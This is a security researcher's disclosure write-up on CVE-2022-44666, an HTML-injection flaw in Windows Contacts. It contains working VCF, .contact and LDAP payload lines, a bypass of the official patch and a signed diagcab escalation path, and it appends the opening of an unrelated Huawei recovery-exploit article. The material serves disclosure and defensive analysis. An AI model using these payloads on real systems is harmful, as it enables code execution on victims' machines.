Microsoft Windows Contacts (VCF/Contact/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day).

Microsoft Windows Contacts (VCF/Contact/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day).

Original text by j00sean

This is the story about another forgotten 0day fully disclosed more than 4 years ago by John Page (aka hyp3rlinx). To understand the report, you have to consider i’m stupid 🙂 And my stupidicity drives me to take longer paths to solve simple issues, but it also leads me to figure out another ways to exploit some bugs. Why do i say this? Because i was unable to quickly understand that the way to create a .contact file is just browsing to Contact folder in order to create the contact, instead of that, i used this info to first create a VCF file and then, i wrongly thought that this was some type of variant. That was also because of my brain can’t understand some 0days are forgotten for so long time ¯\(ツ)/¯ Once done that and after the «wontfix» replies by MSRC and ZDI, further investigations were made to increase the severity, finally reaching out .contact files and windows url protocol handler «ldap».

Details

  • Vendor: Microsoft.
  • App: Microsoft Windows Contacts.
  • Version: 10.0.19044.1826.
  • Tested systems: Windows 10 & Windows 11.
  • Tested system versions: Microsoft Windows [Version 10.0.19044.1826] & Microsoft Windows [Version 10.0.22000.795]

Intro

While i was reading the exploit code for this vulnerability which was actually released as 0day and it’s possible to find ZDI’s report.

Update 2022/07/21: After reporting this case to MS, MSRC’s folks rightly pointed me out Windows Contacts isn’t the default program to open VCF files.

Further research still demonstrates the default program for VCF files on Win7 ESU & WinServer2019 is Windows Contacts (wab.exe), otherwise MS People (PeopleApp.exe) is used. Here is a full table of this testing:

  • Windows 7: Default program for VCF files is Windows Contacts (wab.exe).
  • Windows Server 2019: Default program for VCF files is Windows Contacts (wab.exe).
  • Windows 10: Default program for VCF files is MS People (PeopleApp.exe).
  • Windows 10 + MS Office: Default program for VCF files is MS Outlook (outlook.exe).
  • Windows 11: Default program for VCF files is MS People (PeopleApp.exe).

Anyway they still argue there’s some social engineering involved such as opening a crafted VCF file and clicking on some links to exploit the bug so doesn’t meet the MSRC bug bar for a security update.

Update 2022/07/25: Well, after further research, it’s the same bug. I’ve been finally able to find a .contact proof of concept. It’s actually possible to correctly parse a .contact file using HTML entities. Note this solves the previous issue (Update 2022/07/21) and this file format (.contact) is opened by Windows Contacts, default program for this file extension, even when MS Office is installed in the system. It just needs a first file association if hasn’t yet been done, but the only program installed by default to do that is Windows Contacts.

Update 2022/07/25: This further research made me to reach a point that i was trying to reach some time ago: Use some URL protocol handler to automatically open crafted contact data to exploit the bug. I was finally able to get it working thanks to ldap uri scheme, which is associated by default to Windows Contacts application, so just setting a rogue LDAP server up and serving the payload data under mail, url or wwwhomepage attributes, the exploiting impact is increased because now it’s not needed to double click a malicious VCF/Contact file, we can deliver this using url protocols.

Update 2023/02/08: As a gesture of goodwill by MSRC, John Page (aka hyp3rlinx) has been included in the acknowledgement page for CVE-2022-44666 discovery.

Description

The report basically is the same than above links, however i’ve improved a bit the social engineering involved. In fact, the first thing that i made was to improve the way the links are seen, just like it were a XSS vulnerability, it’s actually an HTML injection so it’s possible to close the first anchor element and insert a new one. Then, i wanted to remove the visibility for those HTML elements so just setting as long «innerHTML» as possible would be enough to hide them (because of there are char limits).

This is the final payload used:

URL;WORK:"></a><a href="notepad">CLICKMEEEEE...</a>

To watch what happens, run procmon and setup a fake target of href attribute like this:

URL;WORK:"></a><a href="foo.exe">CLICKMEEEEE...</a>

Once clicked the link, an output like this is observed in procmon:

This is the stacktrace for the first «CreateFile» operation:

0	FLTMGR.SYS	FltpPerformPreCallbacksWorker + 0x36c	0xfffff806675a666c	C:\WINDOWS\System32\drivers\FLTMGR.SYS
1	FLTMGR.SYS	FltpPassThroughInternal + 0xca	0xfffff806675a611a	C:\WINDOWS\System32\drivers\FLTMGR.SYS
2	FLTMGR.SYS	FltpCreate + 0x310	0xfffff806675dc0c0	C:\WINDOWS\System32\drivers\FLTMGR.SYS
3	ntoskrnl.exe	IofCallDriver + 0x55	0xfffff8066904e565	C:\WINDOWS\system32\ntoskrnl.exe
4	ntoskrnl.exe	IoCallDriverWithTracing + 0x34	0xfffff8066909c224	C:\WINDOWS\system32\ntoskrnl.exe
5	ntoskrnl.exe	IopParseDevice + 0x117d	0xfffff806694256bd	C:\WINDOWS\system32\ntoskrnl.exe
6	ntoskrnl.exe	ObpLookupObjectName + 0x3fe	0xfffff8066941329e	C:\WINDOWS\system32\ntoskrnl.exe
7	ntoskrnl.exe	ObOpenObjectByNameEx + 0x1fa	0xfffff806694355fa	C:\WINDOWS\system32\ntoskrnl.exe
8	ntoskrnl.exe	NtQueryAttributesFile + 0x1c5	0xfffff80669501125	C:\WINDOWS\system32\ntoskrnl.exe
9	ntoskrnl.exe	KiSystemServiceCopyEnd + 0x25	0xfffff806692097b5	C:\WINDOWS\system32\ntoskrnl.exe
10	ntdll.dll	NtQueryAttributesFile + 0x14	0x7ff8f0aed4e4	C:\Windows\System32\ntdll.dll
11	KernelBase.dll	GetFileAttributesW + 0x85	0x7ff8ee19c045	C:\Windows\System32\KernelBase.dll
12	shlwapi.dll	PathFileExistsAndAttributesW + 0x5a	0x7ff8ef20212a	C:\Windows\System32\shlwapi.dll
13	shlwapi.dll	PathFileExistsDefExtAndAttributesW + 0xa1	0x7ff8ef2022b1	C:\Windows\System32\shlwapi.dll
14	shlwapi.dll	PathFileExistsDefExtW + 0x3f	0x7ff8ef2021ef	C:\Windows\System32\shlwapi.dll
15	shlwapi.dll	PathFindOnPathExW + 0x2f7	0x7ff8ef201f77	C:\Windows\System32\shlwapi.dll
16	shell32.dll	PathResolve + 0x154	0x7ff8eebb0954	C:\Windows\System32\shell32.dll
17	shell32.dll	CShellExecute::QualifyFileIfNeeded + 0x105	0x7ff8eebb05c9	C:\Windows\System32\shell32.dll
18	shell32.dll	CShellExecute::ValidateAndResolveFileIfNeeded + 0x5e	0x7ff8eeb1e422	C:\Windows\System32\shell32.dll
19	shell32.dll	CShellExecute::_DoExecute + 0x6d	0x7ff8eeb1e1cd	C:\Windows\System32\shell32.dll
20	shell32.dll	<lambda_519a2c088cd7d0cdfafe5aad47e70646>::<lambda_invoker_cdecl> + 0x2d	0x7ff8eeb09fed	C:\Windows\System32\shell32.dll
21	SHCore.dll	_WrapperThreadProc + 0xe9	0x7ff8f098bf69	C:\Windows\System32\SHCore.dll
22	kernel32.dll	BaseThreadInitThunk + 0x14	0x7ff8f07e7034	C:\Windows\System32\kernel32.dll
23	ntdll.dll	RtlUserThreadStart + 0x21	0x7ff8f0aa2651	C:\Windows\System32\ntdll.dll

Setting a breakpoint in Shell32!ShellExecuteExW, we can have a clearer picture of the functions involved:

CommandLine: "C:\Program Files\Windows Mail\wab.exe" /vcard C:\Users\admin\Documents\vcf-0day\exploit.vcf
...
ModLoad: 00007ff7`c7d50000 00007ff7`c7dd5000   wab.exe 
...
0:000> bp SHELL32!ShellExecuteExW
...
Breakpoint 0 hit
SHELL32!ShellExecuteExW:
00007ff8`eeb20e40 48895c2410      mov     qword ptr [rsp+10h],rbx ss:000000d8`dc2dae88=0000000000090622
0:000> k
 # Child-SP          RetAddr           Call Site
00 000000d8`dc2dae78 00007ff8`d3afee27 SHELL32!ShellExecuteExW
01 000000d8`dc2dae80 00007ff8`d3ad7802 wab32!SafeExecute+0x143
02 000000d8`dc2dbf90 00007ff8`ef3b2920 wab32!fnSummaryProc+0x1c2
03 000000d8`dc2dbfc0 00007ff8`ef3b20c2 USER32!UserCallDlgProcCheckWow+0x144
04 000000d8`dc2dc0a0 00007ff8`ef3b1fd6 USER32!DefDlgProcWorker+0xd2
05 000000d8`dc2dc160 00007ff8`ef3ae858 USER32!DefDlgProcW+0x36
06 000000d8`dc2dc1a0 00007ff8`ef3ade1b USER32!UserCallWinProcCheckWow+0x2f8
07 000000d8`dc2dc330 00007ff8`ef3ad68a USER32!SendMessageWorker+0x70b
08 000000d8`dc2dc3d0 00007ff8`d93a6579 USER32!SendMessageW+0xda
09 000000d8`dc2dc420 00007ff8`d93a62e7 comctl32!CLink::SendNotify+0x12d
0a 000000d8`dc2dd560 00007ff8`d9384bb8 comctl32!CLink::Notify+0x77
0b 000000d8`dc2dd590 00007ff8`d935add2 comctl32!CMarkup::OnButtonUp+0x78
0c 000000d8`dc2dd5e0 00007ff8`ef3ae858 comctl32!CLink::WndProc+0x86ff2
0d 000000d8`dc2dd6f0 00007ff8`ef3ae299 USER32!UserCallWinProcCheckWow+0x2f8
0e 000000d8`dc2dd880 00007ff8`ef3ac050 USER32!DispatchMessageWorker+0x249
0f 000000d8`dc2dd900 00007ff8`d92b6317 USER32!IsDialogMessageW+0x280
10 000000d8`dc2dd990 00007ff8`d92b61b3 comctl32!Prop_IsDialogMessage+0x4b
11 000000d8`dc2dd9d0 00007ff8`d92b5e2d comctl32!_RealPropertySheet+0x2bb
12 000000d8`dc2ddaa0 00007ff8`d3acfb68 comctl32!_PropertySheet+0x49
13 000000d8`dc2ddad0 00007ff8`d3ace871 wab32!CreateDetailsPropertySheet+0x930
14 000000d8`dc2de140 00007ff8`d3ad68f5 wab32!HrShowOneOffDetails+0x4f5
15 000000d8`dc2de390 00007ff8`d3af800f wab32!HrShowOneOffDetailsOnVCard+0xed
16 000000d8`dc2de400 00007ff7`c7d51b16 wab32!WABObjectInternal::VCardDisplay+0xbf
17 000000d8`dc2de450 00007ff7`c7d52c28 wab!WinMain+0x896
18 000000d8`dc2dfab0 00007ff8`f07e7034 wab!__mainCRTStartup+0x1a0
19 000000d8`dc2dfb70 00007ff8`f0aa2651 KERNEL32!BaseThreadInitThunk+0x14
1a 000000d8`dc2dfba0 00000000`00000000 ntdll!RtlUserThreadStart+0x21

And the involved pseudo-code is the next:

_int64 __fastcall fnSummaryProc(HWND hWnd, int a2, WPARAM a3, LONG_PTR a4)
{

...

      default:
        if ( !((v22 + 4) & 0xFFFFFFFD) && *(_WORD *)(v5 + 136) )
          SafeExecute(v7, (const unsigned __int16 *)v9, (const unsigned __int16 *)(v5 + 136)); <== FOLLOW THIS PATH
        break;
    }
  }
  return 1i64;
}


__int64 __fastcall SafeExecute(HWND a1, const unsigned __int16 *a2, const unsigned __int16 *a3)
{
  const unsigned __int16 *v3; // rbx
  HWND v4; // rdi
  unsigned int v5; // ebx
  BOOL v6; // ebx
  __int64 v7; // rdx
  OLECHAR *v8; // rax
  signed int v10; // eax
  DWORD pcchCanonicalized; // [rsp+20h] [rbp-E0h]
  SHELLEXECUTEINFOW pExecInfo; // [rsp+30h] [rbp-D0h]
  OLECHAR Dst[2088]; // [rsp+A0h] [rbp-60h]

  v3 = a3;
  v4 = a1;
  memset_0(Dst, 0, 0x1048ui64);
  pcchCanonicalized = 2084;
  v5 = UrlCanonicalizeW(v3, Dst, &pcchCanonicalized, 0);
  if ( (v5 & 0x80000000) == 0 )
  {
    v6 = UrlIsW(Dst, URLIS_FILEURL);
  pExecInfo.hProcess = 0i64;
      pExecInfo.hwnd = 0i64;
      pExecInfo.lpVerb = 0i64;
      _mm_store_si128((__m128i *)&pExecInfo.lpParameters, (__m128i)0i64);
      *(_OWORD *)&pExecInfo.hInstApp = 0i64;
      *(_OWORD *)&pExecInfo.lpClass = 0i64;
      *(_OWORD *)&pExecInfo.dwHotKey = 0i64;
      if ( !ShellExecuteExW(&pExecInfo) ) <== CALL HERE
      {
        v10 = GetLastError();
        v5 = (unsigned __int16)v10 | 0x80070000;
        if ( v10 <= 0 )
          v5 = v10;
      }
  }
  ...
}

After this, it’s clear the issue actually involves SysLink controls in comctl32.dll library and how the href attribute is parsed by wab32.dll library.

It isn’t possible to use remote shared locations or webdavs to exploit this.

URL;WORK:"></a><a href="\\127.0.0.1@80\test\payload.exe">CLICKMEEEEE...</a>
URL;WORK:"></a><a href="\\vboxsvr\test\payload.exe">CLICKMEEEEE...</a>

The file info is queried but is never executed.

It’s possible to use relative paths such as:

URL;WORK:"></a><a href="foo\foo.exe">CLICKMEEEEE...</a>

Example:

URL;WORK:"></a><a href="hidden\payload.exe">CLICKMEEEEE...</a>

Just going further and while testing rundll32 as attack vector, just noticed it was not possible to use arguments with the payload executable selected. However using a lnk file which targets a chosen executable, it was possible to use cmdline arguments. It’s a bit tricky but it works.

URL;WORK:"></a><a href="hidden\run.lnk">CLICKMEEEEE...</a>

Target of run.lnk:

rundll32.exe hidden\payload.bin,Foo"

This looks more interesting because it’s not needed to drop an executable in the target system.

Impact

Remote Code Execution as the current user logged.

Proofs of Concept

It has to exist file association to use Windows Contacts to open .vcf files.

Update 2021/07/25: For Contact files (.contact) there is only one application to open them by default: Windows Contacts, even when MS Office is installed in the target system.

Using files located in ./report-pocs/:

  1. Double-click the file exploit.vcf (Update 2021/07/25: Or double-click the file exploit.contact).
  2. Do single click in one of «click-me» links.
  3. It launches notepad.exe using different ways to execution:
    • 3.1. Link 1: Run .lnk file that triggers rundll32 with a crafted library.
    • 3.2. Link 2: This triggers the execution of an executable located in folder «hidden» as a local path.
    • 3.3. Link 3: Directly.

There are a couple of videos attached in ./videos:

/videos/full-payload.gif: This is a more complex example which downloads a zip file that allows to trigger all the payloads.

This is a summary of the proof of concept files located in ./report-pocs/:

And files located in ./src:

  • dllmain.cpp: DLL library used as payload (payload.bin).
  • payload.cpp: Executable used as payload (payload.exe).

Further exploitation

For further exploitation and as the vulnerability doesn’t allow to load remote shared location files, uri protocol «search-ms» is an interesting vector. You’ll find proofs of concept which only trigger a local binary like calc or notepad and more complex proofs of concept that i’ve named as weaponized exploit, because of they don’t execute local files. These pocs & exploits are located in ./further-pocs/.

This is a summary of target applications:

In order to reproduce:

  1. Setup a remote shared location (SMB or WebDav). Copy content of ./further-pocs/to-copy-in-remote-shared-location/ into it.
  2. If wanted, hide the files running ./further-pocs/to-copy-in-remote-shared-location/setup-hidden.bat.
  3. Modify file exploit.html/poc.html located in ./further-pocs/[vector or target app]/remote-weaponized-by-searchms/ to point to your remote shared location.
  4. Start a webserver in the target app path, that is: ./further-pocs/[vector or target app]/[poc||remote-weaponized-by-searchms]/.
  5. Run poc/exploit files depending on the case.
  6. For further info, watch the videos located in ./videos:

6.2. Exploit for browsers: ./videos/browsers-exploit.gif.

6.3. PoC for MS Word: ./videos/msword-poc.gif.

6.4. Exploit for MS Word: ./videos/msword-exploit.gif.

6.5. PoC for PDF Readers: ./videos/pdfreaders-poc.gif.

6.6. Exploit for PDF Readers: ./videos/pdfreaders-exploit.gif.

Additionally, these are all the files for further exploitation:

Contact Files

After receiving Update 2022/07/21 from MSRC’s, i decided to take a look into Contact file extension as it would confirm whether or not it’s the same case as that found by the original discoverer, and of course it is. My first proof of concept was just using a different file format, but the bug is the same. Just using wabmig.exe located in «C:\Program Files\Windows Mail» is possible to convert all the VCF files to Contact files.

And as mentioned in the intro updates, these files are opened by Windows Contacts (default program).

The steps to reproduce are the same than those used for VCF files. Same restrictions observed on VCF files are applied with Contact files, that is, it’s not possible to use remote shared locations for the attribute «href» but it’s still possible to use local paths or url protocol «search-ms».

These are all the files added or modified to exploit Contact files:

URL protocol LDAP

As mentioned above, this further research made me to reach a point that i was trying to reach some time ago: Use some URL protocol handler to automatically open crafted contact data to exploit the bug. This challenge was finally achieved thanks to ldap uri scheme.

...
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\LDAP]
@="URL:LDAP Protocol"
"EditFlags"=hex:02,00,00,00
"URL Protocol"=""

[HKEY_CLASSES_ROOT\LDAP\Clsid]
@="{228D9A81-C302-11cf-9AA4-00AA004A5691}"

[HKEY_CLASSES_ROOT\LDAP\shell]

[HKEY_CLASSES_ROOT\LDAP\shell\open]

[HKEY_CLASSES_ROOT\LDAP\shell\open\command]
@=hex(2):22,00,25,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,46,00,69,00,6c,\
  00,65,00,73,00,25,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,77,00,73,00,20,00,\
  4d,00,61,00,69,00,6c,00,5c,00,77,00,61,00,62,00,2e,00,65,00,78,00,65,00,22,\
  00,20,00,22,00,2f,00,6c,00,64,00,61,00,70,00,3a,00,25,00,31,00,22,00,00,00
...

That is:

"%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1"

So just setting a rogue LDAP server up and serving the payload data, it’s possible to use this url protocol handler to launch Windows Contacts (wab.exe) with a malicious payload in the ldif attributes mail, url or wwwhomepage. Note that i was unable to do this working on the attribute «wwwhomepage» as indicated here, but it should theorically work.

The crafted ldif content is just something like this:

...
dn: dc=org
dc: org
objectClass: dcObject

dn: dc=example,dc=org
dc: example
objectClass: dcObject
objectClass: organization

dn: ou=people,dc=example,dc=org
objectClass: organizationalUnit
ou: people

dn: cn=Microsoft,ou=people,dc=example,dc=org
cn: Microsoft
gn: Microsoft
company: Microsoft
title: Microsoft KB5001337-hotfix
mail:"></a><a href="..\hidden\payload.lnk">Run-installer...</a>
url:"></a><a href="..\hidden\payload.exe">Run-installer...</a>
wwwhomepage:"></a><a href="notepad">Run-installer...</a>
objectclass: top
objectclass: person
objectClass: inetOrgPerson
...

And the code for the rogue ldap server was taken borrowed from the quick start server of ldaptor project, located over here.

This is a summary of target applications:

  • Browsers: MS Edge, Google Chrome, Mozilla Firefox & Opera.
  • MS Word.
  • PDF Readers (mainly Adobe Acrobat Reader DC & Foxit PDF Reader).

The steps to reproduce are:

  1. Copy ./further-pocs into remote shared location (SMB or WebDav).
  2. If wanted, hide the files running ./further-pocs/MSWord/setup-hidden.bat.
  3. Install ldaptor by pip: pip install ldaptor. Note this has been tested on Python 2.7 x64.
  4. Start rogue ldap server located in ./further-pocs/ldap-rogue-server/ldap-server.py
  5. Start a webserver in the target app path, that is: ./further-pocs/[vector or target app]/url-protocol-ldap/.
  6. Run exploit files depending on the case.
  7. For further info, watch the videos located in ./videos:

7.2. For MS Word: ./videos/ldap-msword-exploit.gif.

7.3. For PDF Readers: ./videos/ldap-pdfreaders-exploit.gif.

These are the additional files to exploit url protocol ldap:

CVE-2022-44666: Patch analysis and incomplete fix

On Dec 13, 2022 the patch for this vulnerability was released by Microsoft as CVE-2022-44666.

The versions used for diffing the patch (located in C:\Program Files\Common Files\System\wab32.dll) have been:

  • MD5: 588A3D68F89ABF1884BEB7267F274A8B (pre-patch)
  • MD5: D1708215AD2624E666AFD97D97720E81 (post-patch)

Diffing the affected library (wab32.dll) with Diaphora by @matalaz, we’ll find out some new functions:

And these are the partial matches:

Taking a look into the new code in function «fnSummaryProc»:

__int64 __fastcall fnSummaryProc(HWND a1, int a2, WPARAM a3, LONG_PTR a4)
{

...

    if ( v26 <= 0x824 && (!v23 ? (v27 = 0) : (v27 = IsValidWebsiteUrlScheme(v23)), v27) )  // (1)
    {
      v38 = (unsigned __int16 *)2085;
      v39 = &CPercentEncodeRFC3986::`vftable';
      v40 = v23;
      v41 = v26;
      v28 = CPercentEncodeString::Encode(
              (CPercentEncodeString *)&v39,
              (unsigned __int16 *)&Dst,
              (unsigned __int64 *)&v38,
              v25);
      v29 = v7;
      if ( !v28 )
      {
        v30 = (const unsigned __int16 *)&Dst;
LABEL_44:
        SafeExecute(v29, v24, v30);  // (2)
        return 1i64;
      }
    }
    else
    {
      if ( v23 )
        v32 = IsInternetAddress(v23, &v38);
      else
        v32 = 0;
      v29 = v7;
      if ( v32 )
      {
        v30 = v23;
        goto LABEL_44; // (3)
      }
    }
    v31 = GetParent(v29);
    ShowMessageBox(v31, 0xFE1u, 0x30u); // (4)
    return 1i64;
  }
  ...
}

After the fix, the new code calls to the function «SafeExecute» (2) or show a message box (4).

To reach the call of the funcion «SafeExecute» (2) is possible to follow the code flow in (1):

_BOOL8 __fastcall IsValidWebsiteUrlScheme(LPCWSTR pszIn)
{
  const WCHAR *v1; // rbx
  _BOOL8 result; // rax
  DWORD pcchOut; // [rsp+30h] [rbp-68h]
  char Dst; // [rsp+40h] [rbp-58h]

  v1 = pszIn;
  result = 0;
  if ( UrlIsW(pszIn, URLIS_URL) ) // (5)
  {
    memset_0(&Dst, 0, 0x40ui64);
    pcchOut = 32;
    if ( UrlGetPartW(v1, (LPWSTR)&Dst, &pcchOut, 1u, 0) >= 0
      && (!(unsigned int)StrCmpICW(&Dst, L"http") || !(unsigned int)StrCmpICW(&Dst, L"https")) )  // (6)
    {
      result = 1;
    }
  }
  return result;
}

This function first checks if the URL is valid in (5), then, it checks whether or not it starts with «http» or «https» in (6). This code path looks safe enough. Coming back to the function «fnSummaryProc», there’s another code path that could help to bypass the fix in (3).

__int64 __fastcall IsInternetAddress(unsigned __int16 *a1, unsigned __int16 **a2)
{
  unsigned __int16 v2; // ax
  unsigned __int16 **v3; // r14
  unsigned __int16 *v4; // rdi
  unsigned __int16 *v5; // r15
  unsigned __int16 v6; // dx
  unsigned __int16 *v7; // r8
  unsigned __int16 *v8; // rcx
  WCHAR v9; // ax
  _WORD *v10; // rsi
  int v11; // ebp
  LPWSTR v12; // rax
  unsigned __int16 *v14; // rax

  v2 = *a1;
  v3 = a2;
  v4 = a1;
  v5 = a1;
  while ( v2 && v2 != 0x3C )
  {
    a1 = CharNextW(a1);
    v2 = *a1;
  }
  v6 = *a1;
  v7 = a1;
  if ( *a1 )
  {
    v8 = a1 + 1;
    v4 = v8;
  }
  else
  {
    v8 = v4;
  }
  v9 = *v8;
  v10 = (_WORD *)((unsigned __int64)v7 & -(__int64)(v6 != 0));
  v11 = v6 != 0;
  if ( *v8 & 0xFFBF )
  {
    while ( v9 <= 0x7Fu && v9 != 0xD && v9 != 0xA )
    {
      if ( v9 == 0x40 )  // (7)
      {
        v14 = CharNextW(v8);
        if ( !(unsigned int)IsDomainName(v14, v11, v3 != 0i64) )  // (8)
          return 0i64;
        if ( v3 )
        {
          if ( v10 )
          {
            *v10 = 0;
            TrimSpaces(v5);
          }
          *v3 = v4;
        }
        return 1i64;
      }
      v12 = CharNextW(v8);
      v8 = v12;
      v9 = *v12;
      if ( !v9 )
        return 0i64;
    }
  }
  return 0i64;
}

One thing caught my attention about this in (7), where the code is checking whether it exists a char «@». Then, it calls to the function «IsDomainName» in order to check whether or not the string after the char «@» is a domain name:

__int64 __fastcall IsDomainName(unsigned __int16 *a1, int a2, int a3)
{
  int v3; // edi
  int v4; // ebx
  int v5; // er9
  __int64 v6; // rdx

  v3 = a3;
  v4 = a2;
  if ( !a1 )
    return 0i64;
LABEL_2:
  v5 = *a1;
  if ( !(_WORD)v5 || (_WORD)v5 == 0x2E || v4 && (_WORD)v5 == 0x3E )
    return 0i64;
  while ( (_WORD)v5 && (!v4 || (_WORD)v5 != 0x3E) )
  {
    if ( (unsigned __int16)v5 >= 0x80u )
      return 0i64;
    if ( (unsigned __int16)(v5 - 10) <= 0x36u )
    {
      v6 = 19140298416324617i64;
      if ( _bittest64(&v6, (unsigned int)(v5 - 10)) )
        return 0i64;
    }
    if ( (_WORD)v5 == 46 )
    {
      a1 = CharNextW(a1);
      if ( a1 )
        goto LABEL_2;
      return 0i64;
    }
    a1 = CharNextW(a1);
    v5 = *a1;
  }
  if ( v4 )
  {
    if ( (_WORD)v5 != 0x3E )
      return 0i64;
    if ( v3 )
      *a1 = 0;
  }
  return 1i64;
}

So the bypass for the fix is pretty simple. It’s just necessary to use a single char «@». Symlink href attributes like these will successfully bypass the fix:

hidden\@payload.lnk
hidden\@payload.exe
hidden@payload.lnk
hidden@payload.exe

For further info, there’s a video for a standalone contact file.

Proof of concept located in ./bypass/report-pocs.

And another one for MS Word and LDAP url protocol.

Proof of concept located in ./bypass/further-pocs.

One day later the patch release, this information was sent to MSRC. Unfortunately, the case has been recently closed with no further info about it.

Diagcab file as payload

After CVE-2022-30190 also known as Follina vulnerability and CVE-2022-34713 also known as DogWalk vulnerability, a publicly known but underrated technique was reborn again thanks to @buffaloverflow. My mate and friend Eduardo Braun Prado gave me the idea to use this technique over here.

There are some pre-requirements to do this:

  1. The target user has to belong to administrator group. If not, there’s a UAC prompt.
  2. The diagcab file has to be signed, so the codesigning certificate must have been installed in the target computer.

A real attack scenario would pass for stealing a code signing certificate which is in fact installed in the target system. But as this is just a proof of concept, a self-signed code signing certificate was generated and used to sign the diagcab file named as @payload.diagcab.

So in order to repro, it’s needed to install the certificate located in cert.cer under Trusted Root Certificate Authority like this:

To finally elevate the priveleges, a token stealing/impersonation could be used. In this case, «parent process» technique was the chosen one. A modified version for this script was included inside the resolver scripts.

For further info, there’s a video for MS Word and LDAP url protocol.

Proof of concept located in ./bypass/diagcab-pocs.

Proposed fix

Remember the vulnerable code in the function «fnSummaryProc»:

...
LABEL_44:
        SafeExecute(v29, v24, v30); // Vulnerable call to shellexecute
        return 1i64;
      }
    }
    else
    {
      if ( v23 )
        v32 = IsInternetAddress(v23, &v38); // Bypass with a single "@"
      else
        v32 = 0;
      v29 = v7;
      if ( v32 )
      {
        v30 = v23;
        goto LABEL_44;
      }
    }
...

The function «IsInternetAddress» was intentionally created to check if the href attr corresponds to any email address. So my proposed fix (and following the imported functions that the library uses) would be:

...
      if (v32 && !(unsigned int)StrCmpNICW(L"mailto:", v23, 7i64)) // Check out the href really starts with "mailto:"
      {
          v30 = v23;
          goto LABEL_44;
      }
...

So simple like this, it’s only needed to check this out before calling to «SafeExecute». Just testing if the target string (v23) starts with «mailto:», the bug would be fully fixed IMHO.

Unofficial fix

Some days/weeks ago when i contacted @mkolsek of 0patch to inform him about this issue, who by the way is always very kind to me, told me this has been receiving an unofficial fix for Windows 7 since then (4 years ago). That was a surprise and good news!

It was tested and successfully stopped the new variant of CVE-2022-44666. The micropatch prepends «http://» to the attacker-controlled string passed by the href attr if doesn’t start with «mailto:», «http://» or «https://», which is enough to fully fix the issue. Now it’s going to be extended for the latest Windows versions, only necessary to update some offsets.

Either way, it would be better to get an official patch.

Acknowledgments

  • @hyp3rlinx: Special shout out and acknowledgement because he began this research some years ago and his work was essential for this writeup. He should have been also credited for finding this out but unfortunately i was unable to contact him just in time. It’s already been done (Update 2023/02/08).
  • @Edu_Braun_0day: who also worked around this issue.
  • @mkolsek.
  • @matalaz.
  • @buffaloverflow.
  • @msftsecresponse.

By @j00sean

[BugTales] REUnziP: Re-Exploiting Huawei Recovery With FaultyUSB

[BugTales] REUnziP: Re-Exploiting Huawei Recovery With FaultyUSB

Original text by Lorant Szabo

Last year we published UnZiploc, our research into Huawei’s OTA update implementation. Back then, we have successfully identified logic vulnerabilities in the implementation of the Huawei recovery image that allowed root privilege code execution to be achieved by remote or local attackers. After Huawei fixed the vulnerabilities we have reported, we decided to take a second look at the new and improved recovery mode update process.

This time, we managed to identify a new vulnerability in a proprietary mode called “SD-Update”, which can once again be used to achieve arbitrary code execution in the recovery mode, enabling unauthentic firmware updates, firmware downgrades to a known vulnerable version or other system modifications. Our advisory for the vulnerability is published here.

The story of exploiting this vulnerability was made interesting by the fact that, since the exploit abuses wrong assumptions about the behavior of an external SD card, we needed some hardware-fu to actually be able to trigger it. In this blog post, we describe how we went about creating “FaultyUSB” — a custom Raspberry Pi based setup that emulates a maliciously behaving USB flash drive — and exploiting this vulnerability to achieve arbitrary code execution as root!

Huawei SD-update: Updates via SD Card

Huawei devices implement a proprietary update solution, which is identical throughout Huawei’s device lineup regardless of the employed chipset (Hisilicon, Qualcomm, Mediatek) or the used base OS (EMUI, HarmonyOS) of a device.

This common update solution has in fact many ways to apply a system update, one of them is the “SD-update”. As its name implies, the “SD-update” method expects the update file to be stored on an external media, such as on an SD card or on an USB flash drive. After reverse engineering how Huawei implements this mode, we have identified a logic vulnerability in the handling of the update file located on external media, where the update file gets reread between different verification phases.

While this basic vulnerability primitive is straightforward, exploitation of it presented some interesting challenges, not least of which was that we needed to develop a custom software emulation of an USB flash drive to be able to provide the recovery with different data on each read, as well as we had to identify additional gaps of the update process authentication implementation to make it possible to achieve arbitrary code execution as root in recovery mode.

Time-of-Check to Time-of-Use

The root cause of the vulnerability lies in an unfortunate design decision of the external media update path of the recovery binary: when the user supplies the update files on a memory card or a USB mass-storage device, the recovery handles them in-place.

In bird’s-eye view the update process contains two major steps: verification of the ZIP file signature and then applying the actual system update. The problem is that the recovery binary accesses the external storage device numerous times during the update process; e.g. first it discovers the relevant update files, then reads the version and model numbers, verifies the authenticity of the archive, etc.

So in case of an legitimate update archive, once the verification succeeds, the recovery tries to read the media again to perform the actual installation. But a malicious actor can swap the update file just between the two stages, thus the installation phase would use a different, thus unverified update archive. In essence, we have a textbook “Time-of-Check to Time-of-Use” (ToC-ToU) vulnerability, indicating that a race condition can be introduced between the “checking” (verification) and the “using” (installation) stages. The next step was figuring out how we could actually trigger this vulnerability in practice!

Attacking Multiple Reads in the Recovery Binary

With an off-the-shelf USB flash drive it is very clear that by considering a specific offset, two reads without intermediate writes must result in the same data, otherwise the drive would be considered faulty. So in terms of the update procedure this means the data-consistency is preserved: during the update for each point in time the data on the external drive matches up with what the recovery binary reads. Consequently, as long as a legitimate USB drive is used, the design decision of using the update file in-place is functionally correct.

Now consider a “faulty” USB flash drive, which returns different data when the same offset if read twice (of course, without any writes between them). This would break the data-consistency assumption of the update process, as it may happen that different update steps see the update file differently.

The update media is basically accessed for three distinct reasons: listing and opening files, opening the update archive as a traditional ZIP file, and reading the update archive for Android-specific signature verification. These access types could enable different modes of exploiting this vulnerability by changing the data returned by the external media. For example, in the case of multiple file system accesses of the same location, the 

update.zip
file itself can be replaced as-is with a completely unrelated file. Alternatively, multiple reads during the ZIP parsing can be turned into smuggling new ZIP entries inside the original archive (see the CVE-2021-40045: Huawei Recovery Update Zip Signature Verification Bypass vulnerability in UnZiploc).

Accordingly, multiple kinds of exploitation goals can be set. For example by only modifying the content of the 

UPDATE.APP
 file of the update archive at install time, an arbitrary set of partitions can be written with arbitrary data on the main flash. A more generic approach is to gain code execution just before writing to flash in the 
EreInstallPkg
 function, by smuggling a custom 
update-binary
 into the ZIP file.

In the following we are going to use the approach of injecting a custom binary in order to achieve the arbitrary code execution by circumventing the update archive verification.

